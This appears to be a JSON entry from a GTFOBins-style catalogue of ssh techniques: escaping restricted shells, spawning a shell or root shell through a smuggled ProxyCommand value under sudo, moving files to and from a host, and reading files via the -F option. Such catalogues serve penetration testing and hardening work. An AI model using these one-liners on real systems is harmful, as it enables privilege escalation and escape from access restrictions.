You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

38 lines
1.0 KiB
JSON

{
"functions": {
"shell": [
{
"description": "Reconnecting may help bypassing restricted shells.",
"code": "ssh localhost $SHELL --noprofile --norc"
},
{
"description": "Spawn interactive shell through ProxyCommand option.",
"code": "ssh -o ProxyCommand=';sh 0<&2 1>&2' x"
}
],
"file-upload": [
{
"description": "Send local file to a SSH server.",
"code": "ssh [user@host] \"cat > [destination_file]\" < [source_file]\n"
}
],
"file-download": [
{
"description": "Fetch a remote file from a SSH server.",
"code": "ssh [user@host] \"cat [source_file]\" > [destination_file]\n"
}
],
"file-read": [
{
"description": "The read file content is corrupted by error prints.",
"code": "ssh -F [file] localhost\n"
}
],
"sudo": [
{
"description": "Spawn interactive root shell through ProxyCommand option.",
"code": "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x"
}
]
}
}